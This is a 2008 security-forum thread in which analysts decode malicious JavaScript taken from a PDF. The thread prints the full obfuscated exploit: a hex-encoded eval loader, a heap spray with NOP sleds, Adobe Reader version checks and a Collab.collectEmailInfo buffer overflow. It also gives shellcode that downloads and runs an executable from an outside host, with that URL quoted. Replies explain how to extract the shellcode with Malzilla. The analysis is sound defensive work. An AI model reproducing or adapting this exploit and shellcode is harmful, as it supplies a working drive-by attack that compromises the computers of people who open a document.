Author Topic: PDF exploit  (Read 8664 times)

0 Members and 1 Guest are viewing this topic.

August 26, 2008, 01:00:58 pm
Read 8664 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
This javascript is part of a pdf file from

hxxp://rumplif.com/JNjdscc/spl/pdf.pdf

I have problems to decode it. First level is no problem, but then I stuck.

Can anybody help ?

Code: [Select]
function lar(xokp){var twmq="";for(vhb=0;vhb<xokp.length;vhb+=2){twmq+=(String.fromCharCode(parseInt(xokp.substr(vhb,2),16)));}eval(twmq);}lar("766172206D4D365249746D4B203D206E657720417272617928293B0D0A0D0A66756E6374696F6E20794E594A387956442848796475724155522C205862475172637959290D0A7B0D0A097768696C65202848796475724155522E6C656E6774682A323C586247517263795929207B0D0A09094879647572415552202B3D2048796475724155523B0D0A097D0D0A0D0A094879647572415552203D2048796475724155522E737562737472696E6728302C58624751726379592F32293B0D0A0D0A0972657475726E2048796475724155523B0D0A7D0D0A0D0A66756E6374696F6E206F6F79533159555228290D0A7B0D0A09766172206A4B74735F453968203D20307830633063306330633B0D0A097661722069306137654A4E4C203D20756E657363617065282225753433343325753433343325753066656225753333356225753636633925753830623925753830303125756566333322202B0D0A2225756532343325756562666125756538303525756666656325756666666625753862376625756466346525756566656625753634656625756533616625753966363425753432663325753966363425753665653725756566303325756566656222202B0D0A2225753634656625756239303325753631383725756531613125753037303325756566313125756566656625756161363625756239656225753737383725753635313125753037653125756566316625756566656625756161363625756239653722202B0D0A2225756361383725753130356625753037326425756566306425756566656625756161363625756239653325753030383725753066323125753037386625756566336225756566656625756161363625756239666625753265383725753061393622202B0D0A2225753037353725756566323925756566656625756161363625756166666225756437366625753961326325753636313525756637616125756538303625756566656525756231656625753961363625753634636225756562616125756565383522202B0D0A2225753634623625756637626125753037623925756566363425756566656625753837626625756635643925753966633025753738303725756566656625753636656625756633616125753261363425753266366325753636626625756366616122202B0D0A2225753130383725756566656625756266656625756161363425753835666225756236656425756261363425753037663725756566386525756566656625756161656325753238636625756233656625756331393125753238386125756562616622202B0D0A2225753861393725756566656625753961313025753634636625756533616125756565383525753634623625756637626125756166303725756566656625753835656625756237653825756161656325756463636225756263333425753130626322202B0D0A2225756366396125756263626625756161363425753835663325756236656125756261363425753037663725756566636325756566656625756566383525753961313025753634636625756537616125756564383525753634623625756637626122202B0D0A2225756666303725756566656625753835656625753634313025756666616125756565383525753634623625756637626125756566303725756566656625756165656625756264623425753065656325753065656325753065656325753065656322202B0D0A2225753033366325756235656225753634626325753064333525756264313825753066313025753634626125753634303325756537393225756232363425756239653325753963363425753634643325756631396225756563393725756239316322202B0D0A2225753939363425756563636625756463316325756136323625753432616525753263656325756463623925756530313925756666353125753164643525756537396225753231326525756563653225756166316425753165303425753131643422202B0D0A2225753961623125756235306125753034363425756235363425756563636225753839333225756533363425753634613425756633623525753332656325756562363425756563363425756231326125753264623225756566653725753162303722202B0D0A2225753130313125756261313025756133626425756130613225756566613125753734363825753730373425753246334125753631324625753643364625753646363325753645373525753635373425753245373225753646363325753246364425753639353625753442353725753337333625753246343225753738363525753245363525753638373025753030373022293B0D0A09766172205939496236757545203D2030783430303030303B0D0A097661722078784B614B445555203D2069306137654A4E4C2E6C656E677468202A20323B0D0A09766172205862475172637959203D205939496236757545202D202878784B614B4455552B30783338293B0D0A09766172204879647572415552203D20756E657363617065282225753930393025753930393022293B0D0A0D0A094879647572415552203D20794E594A387956442848796475724155522C205862475172637959293B0D0A09766172206C596162366F7A78203D20286A4B74735F453968202D203078343030303030292F59394962367575453B0D0A090D0A09666F7220287661722067455A43693039523D303B67455A43693039523C6C596162366F7A783B67455A43693039522B2B29207B0D0A09096D4D365249746D4B5B67455A43693039525D203D204879647572415552202B2069306137654A4E4C3B0D0A097D0D0A7D0D0A0D0A66756E6374696F6E20525969464573384B28290D0A7B0D0A09766172205872435532304966203D206170702E76696577657256657273696F6E2E746F537472696E6728293B0D0A095872435532304966203D2058724355323049662E7265706C616365282F5C442F672C2727293B0D0A0D0A0D0A0976617220545057524A545A4A203D206E6577204172726179280D0A090958724355323049662E6368617241742830292C0D0A090958724355323049662E6368617241742831292C0D0A090958724355323049662E636861724174283229293B0D0A0D0A0D0A096966202828545057524A545A4A5B305D203D3D2038202626202828545057524A545A4A5B315D203D3D203120262620545057524A545A4A5B325D203C203229207C7C20545057524A545A4A5B315D203C20312929207C7C0D0A092020202028545057524A545A4A5B305D203D3D203720262620545057524A545A4A5B315D203C203129207C7C0D0A092020202028545057524A545A4A5B305D203C20372929207B0D0A09096F6F79533159555228293B0D0A0909766172206E616247525F6463203D20756E657363617065282225753063306325753063306322293B0D0A09097768696C65286E616247525F64632E6C656E677468203C20343439353229206E616247525F6463202B3D206E616247525F64633B0D0A0909746869732E636F6C6C616253746F7265203D20436F6C6C61622E636F6C6C656374456D61696C496E666F287B7375626A3A2022222C6D73673A206E616247525F64637D293B0D0A097D0D0A7D0D0A0D0A525969464573384B28293B0D0A");
The second function is no problem. It fills a buffer with FF and produces the buffer overlow.

Code: [Select]
function RYiFEs8K()
{
var XrCU20If = app.viewerVersion.toString();
XrCU20If = XrCU20If.replace(/\D/g,'');


var TPWRJTZJ = new Array(
XrCU20If.charAt(0),
XrCU20If.charAt(1),
XrCU20If.charAt(2));


if ((TPWRJTZJ[0] == 8 && ((TPWRJTZJ[1] == 1 && TPWRJTZJ[2] < 2) || TPWRJTZJ[1] < 1)) ||
    (TPWRJTZJ[0] == 7 && TPWRJTZJ[1] < 1) ||
    (TPWRJTZJ[0] < 7)) {
ooyS1YUR();
var nabGR_dc = unescape("%u0c0c%u0c0c");
while(nabGR_dc.length < 44952) nabGR_dc += nabGR_dc;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: nabGR_dc});
}
}

RYiFEs8K();

I'm interested in getting the code from the beginning of the
script (encoded in var i0a7eJNL). How can I save the binary code
from it ?

Code: [Select]
var mM6RItmK = new Array();

function yNYJ8yVD(HydurAUR, XbGQrcyY)
{
while (HydurAUR.length*2<XbGQrcyY) {
HydurAUR += HydurAUR;
}

HydurAUR = HydurAUR.substring(0,XbGQrcyY/2);

return HydurAUR;
}

function ooyS1YUR()
{
var jKts_E9h = 0x0c0c0c0c;
var i0a7eJNL = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u612F%u6C6F%u6F63%u6E75%u6574%u2E72%u6F63%u2F6D%u6956%u4B57%u3736%u2F42%u7865%u2E65%u6870%u0070");
var Y9Ib6uuE = 0x400000;
var xxKaKDUU = i0a7eJNL.length * 2;
var XbGQrcyY = Y9Ib6uuE - (xxKaKDUU+0x38);
var HydurAUR = unescape("%u9090%u9090");

HydurAUR = yNYJ8yVD(HydurAUR, XbGQrcyY);
var lYab6ozx = (jKts_E9h - 0x400000)/Y9Ib6uuE;

for (var gEZCi09R=0;gEZCi09R<lYab6ozx;gEZCi09R++) {
mM6RItmK[gEZCi09R] = HydurAUR + i0a7eJNL;
}
}
Ruining the bad guy's day

August 26, 2008, 03:26:55 pm
Reply #1

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
If you use Malzilla, here are the instructions:
- select the shellcode (it have a form of unicode sequence here) - %u4343%u4343...%u2E65%u6870%u0070
- copy/paste it to Misc decoders tab
- right-click on the code > Run Script > Concatenate
- click on Decode UCS2 (%u)

Now you have the plain shellcode on the screen, and the download link is visible.

If you want to save the shellcode to file, here are the instructions:
- select the shellcode (it have a form of unicode sequence here) - %u4343%u4343...%u2E65%u6870%u0070
- copy/paste it to Misc decoders tab
- right-click on the code > Run Script > Concatenate
- click on UCS2 to Hex
- click on Hex to File

August 26, 2008, 07:59:36 pm
Reply #2

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Thanks, Bobby.

The download url inside the script is

hxxp://aolcounter.com/ViWK67B/exe.php

It downloads an exe file.

This is the result from virustotal :

http://www.virustotal.com/de/analisis/c6d01bc69651d7be560333c59a2e0c6d

The url of the site which redirected to the pdf exploit site is

 hxxp://www.ultra-pornstars.com/tgp/sandeewestgate.html
Ruining the bad guy's day